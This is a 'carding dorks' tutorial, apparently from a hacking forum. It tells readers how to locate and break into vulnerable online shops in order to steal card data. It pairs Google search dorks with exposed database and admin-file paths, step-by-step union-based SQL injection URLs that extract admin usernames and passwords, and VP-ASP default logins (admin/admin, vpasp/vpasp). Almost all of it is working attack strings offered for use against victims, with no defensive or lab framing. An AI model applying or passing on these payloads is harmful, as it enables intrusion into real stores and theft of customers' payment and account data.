Carding Dorks

1. [1]
2. code:
3. google.com:--> allinurl:/shop/category.asp/catid=
4. target looks like :--> www.xxxxx.com/shop/category.asp/catid=xxxxxx
5. exploit :--> /admin/dbsetup.asp
6. target whit exploit :--> www.xxxxxx.com/admin/dbsetup.asp
7. after geting that page look for dbname and path. (this is also good file sdatapdshoppro.mdb , access.mdb)
8. target for dl the data base :--> www.xxxxxx.com/data/pdshoppro.mdb (dosent need to be like this)
9. in db look for access to find pass and user of shop admins.
10.  
11. [2]
12. code:
13. google.com:--> allinurl:/commercesql/
14. target looks like :--> www.xxxxx.com/commercesql/xxxxx
15. exploit :--> cgi-bin/commercesql/index.cgi?page=
16. target whit exploit admin config :--> http://www.xxxxxx.co..../admin_conf.pl
17. target whit exploit admin manager :--> http://www.xxxxxx.co....in/manager.cgi
18. target whit exploit order.log :--> http://www.xxxxx.com....iles/order.log
19.  
20. [3]
21. code
22. 1/search google: allinurl:"shopdisplayproducts.asp?id=
23. --->http://victim.com/shopdisplayproducts.asp?id=5
24.  
25. 2/find error by adding '
26. --->http://victim.com/shopdisplayproducts.asp?id=5'
27.  
28. --->error: Microsoft JET database engine error "80040e14"...../shop$db.asp, line467
29.  
30. -If you don't see error then change id to cat
31.  
32. --->http://victim.com/shopdisplayproducts.asp?cat=5'
33.  
34. 3/if this shop has error then add this: %20union%20select%201%20from%20tbluser"having%201= 1--sp_password
35.  
36. --->http://victim.com/shopdisplayproduct...on%20select%20 1%20from%20tbluser"having%201=1--sp_password
37.  
38. --->error: 5' union select 1 from tbluser "having 1=1--sp_password.... The number of column in the two selected tables or queries of a union queries do not match......
39.  
40. 4/ add 2,3,4,5,6.......until you see a nice table
41.  
42. add 2
43. ---->http://victim.com/shopdisplayproduct...on%20select%20 1,2%20from%20tbluser"having%201=1--sp_password
44. then 3
45. ---->http://victim.com/shopdisplayproduct...on%20select%20 1,2,3%20from%20tbluser"having%201=1--sp_password
46. then 4 ---->http://victim.com/shopdisplayproduct...on%20select%20 1,2,3,4%20from%20tbluser"having%201=1--sp_password
47.  
48. ...5,6,7,8,9.... untill you see a table. (exp:...47)
49.  
50. ---->http://victim.com/shopdisplayproduct...on%20select%20 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7,38,39,40,41,42,,43,44,45,46,47%20from%20tbluser" having%201=1--sp_password
51. ---->see a table.
52.  
53.  
54. 5/When you see a table, change 4 to fldusername and 22 to fldpassword you will have the admin username and password
55.  
56. --->http://victim.com/shopdisplayproduct...on%20%20elect% 201,2,3,fldusername,5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20,21,fldpassword,23,24,25,26,27,28,29,3 0,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46, 47%20from%20tbluser%22having%201=1--sp_password
57.  
58. 6/Find link admin to login:
59. try this first: http://victim.com/shopadmin.asp
60. or: http://victim.com/shopadmin.asp
61.  
62.  
63. Didn't work? then u have to find yourself:
64.  
65. add: (for the above example) '%20union%20select%201,2,3,fieldvalue,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration"ha ving%201=1--sp_password
66.  
67. --->http://victim.com/shopdisplayproduct...n%20select%201 ,2,3,fieldvalue,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22, 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 ,40,41,42,43,44,45,46,47%20from%20configuration"ha ving%201=1--sp_password
68.  
69.  
70. you'll see something like: ( lot of them)
71.  
72. shopaddmoretocart.asp
73. shopcheckout.asp
74. shopdisplaycategories.asp
75. ..............
76.  
77. then guess admin link by adding the above data untill you find admin links
78.  
79. [4]
80. Type: VP-ASP Shopping Cart
81. Version: 5.00
82. Dork = intitle:VP-ASP Shopping Cart 5.00
83. You will find many websites with VP-ASP 5.00 cart software installed
84. Now let's get to the exploit..
85.  
86. the page will be like this ****://***.victim.com/shop/shopdisplaycategories.asp
87. The exploit is : diag_dbtest.asp
88. so do this:
89. ****://***.victim.com/shop/diag_dbtest.asp
90.  
91. A page will appear with something like:
92.  
93. xDatabase
94. shopping140
95.  
96. xDblocation
97. resx
98.  
99. xdatabasetypexEmailxEmailNamexEmailSubjectxEmailSy stemxEmailTypexOrdernumber.:. EXAMPLE .:.
100. the most important thing here is xDatabase
101. xDatabase: shopping140
102. ok now the URL will be like this:
103. ****://***.victim.com/shop/shopping140.mdb
104. if you didn't download the Database..
105. Try this while there is dblocation.
106. xDblocation
107. resx
108.  
109. the url will be:
110. ****://***.victim.com/shop/resx/shopping140.mdb
111. If u see the error message you have to try this :
112. ****://***.victim.com/shop/shopping500.mdb
113.  
114. download the mdb file and you should be able to open it with any mdb file viewer, you should be able to find one at download.com
115.  
116. inside you should be able to find *** information.
117. and you should even be able to find the admin username and password for the website.
118.  
119. the admin login page is usually located here
120. ****://***.victim.com/shop/shopadmin.asp
121.  
122. if you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb file at all then try to find the admin login page and enter the default passwords which are
123.  
124. Username: admin
125. password: admin
126. OR
127. Username: vpasp
128. password: vpasp